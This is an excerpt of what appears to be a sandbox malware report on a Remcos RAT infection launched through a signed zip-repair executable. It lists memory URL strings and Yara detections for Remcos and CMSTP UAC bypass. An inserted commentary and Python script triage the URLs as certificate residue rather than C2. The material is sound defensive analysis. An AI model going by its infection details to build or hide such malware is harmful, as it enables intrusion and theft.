Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcd.com0&
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: DZIPR.exe, 00000011.00000002.2343813669.0000000003588000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EB5000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004DEB000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.0000000004982000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004D5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.info-zip.org/
Source: DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://www.repairfile.com
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/cps0(
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/rpa00
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0/
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: svchost.exe, 00000015.00000003.2438441779.000002061F05E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000015.00000003.2438441779.000002061F000000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
Source: DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
Source: DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/support/
Source: DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/zip-repair/
Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.c
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
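The URL rows above are mostly certificate-chain plumbing rather than C2: AIA, CRL, OCSP and CPS pointers from the Authenticode signature of the signed DataNumen executable (DZIPR.exe), and the string extractor leaves the DER bytes that follow each URL glued to it ("crt0", "com0A", "rpa00": the "0" is the 0x30 SEQUENCE tag, the optional next character is the length octet when it happens to be printable). The DataNumen rows are fused resource strings, where the byte between two URLs is the one-byte length prefix of the second one ("%" is 0x25 = 37, the length of the zip-repair URL that follows it). The following script is an added triage example, not part of the Joe Sandbox report or of any DataNumen code: it parses rows of this shape, strips the residue only where the remainder is clearly a complete URL, separates PKI infrastructure from URLs that still deserve a look, and records which processes each string came from. The sample rows are copied from the report with their source lists shortened; the category names are my own.

```python
"""Triage 'String found in binary or memory' rows from a Joe Sandbox report.

'0' after a URL is the DER SEQUENCE tag (0x30) of the next certificate element,
followed by its length octet when that octet is printable.  Two URLs run together
are counted resource strings: the byte between them is the length of the second.
"""
import re

# Rows copied from the report (constructed subset, source lists shortened).
REPORT_ROWS = [
    "Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0",
    "Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://ocsp.digicert.com0A",
    "Source: DZIPR.exe.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0",
    "Source: DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://www.symauth.com/rpa00",
    "Source: DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/%https://www.datanumen.com/zip-repair/",
    "Source: DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf",
    "Source: svchost.exe, 00000015.00000003.2438441779.000002061F000000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20",
    "Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.c",
    "Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sv.symcd.com0&",
]

ROW_RE = re.compile(r"^Source: (?P<sources>.+?) String found in binary or memory: (?P<value>\S+)$")
DER_TAIL_RE = re.compile(r"0[ -~]?$")          # SEQUENCE tag + optional printable length octet
# Endings after which a trailing '0' cannot belong to the URL itself.
CLEAN_ENDINGS = (".crt", ".crl", ".htm", "/cps", "/rpa", "/CPS", "/")


def split_fused(value):
    """Split URLs the extractor ran together.  The byte before each following URL
    is that URL's one-byte length prefix; it is dropped only when the length agrees."""
    parts = [p for p in re.split(r"(?=https?://)", value) if p]
    out = []
    for i, part in enumerate(parts):
        if i + 1 < len(parts) and ord(part[-1]) == len(parts[i + 1]):
            part = part[:-1]
        out.append(part)
    return out


def strip_der_tail(url):
    """Drop DER residue glued to a URL, but only if the remainder is a whole URL
    (bare host, or one of CLEAN_ENDINGS); otherwise the '0' may be real."""
    m = DER_TAIL_RE.search(url)
    if not m:
        return url
    base = url[: m.start()]
    host_only = base.count("/") == 2            # 'http://host' with no path
    return base if host_only or base.endswith(CLEAN_ENDINGS) else url


def classify(url):
    """Label certificate-chain URLs; everything else is left for an analyst."""
    low = url.lower()
    host = low.split("/")[2] if low.count("/") >= 2 else ""
    if low.endswith(".crt"):
        return "pki:aia-ca-issuer"               # Authority Information Access, caIssuers
    if low.endswith(".crl"):
        return "pki:crl"                         # CRL distribution point
    if host.startswith("ocsp.") or host.endswith(".symcd.com"):
        return "pki:ocsp"
    if low.endswith(("/cps", "/rpa", "-cps-repository.htm")):
        return "pki:policy"                      # certificate policy / relying-party agreement
    return "review"


def triage(rows):
    """Map each cleaned URL to its category and the set of processes/files it was seen in."""
    found = {}
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        tokens = [t.strip() for t in m["sources"].split(",")]
        origins = {t for t in tokens if not t.endswith(".sdmp")}   # process names and .dr files
        for raw in split_fused(m["value"]):
            url = strip_der_tail(raw)
            entry = found.setdefault(url, {"category": classify(url), "origins": set(), "raw": set()})
            entry["origins"] |= origins
            entry["raw"].add(raw)
    return found


if __name__ == "__main__":
    for url, info in sorted(triage(REPORT_ROWS).items(), key=lambda kv: kv[1]["category"]):
        print(f"{info['category']:<18} {url}  <- {', '.join(sorted(info['origins']))}")
```

Running it on the full URL section leaves the DataNumen, info-zip, VMware and Office CDN strings in the "review" bucket and everything DigiCert/Symantec under a pki label; the residue rule deliberately refuses to touch the Office CDN URL, whose genuine trailing "20" would otherwise be mangled. Note that none of these URLs is the Remcos C2; that comes from the malware configuration section of the report, not from this string dump.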
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA504EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 17_2_6FA504EE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

E-Banking Fraud

Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

System Summary

Source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
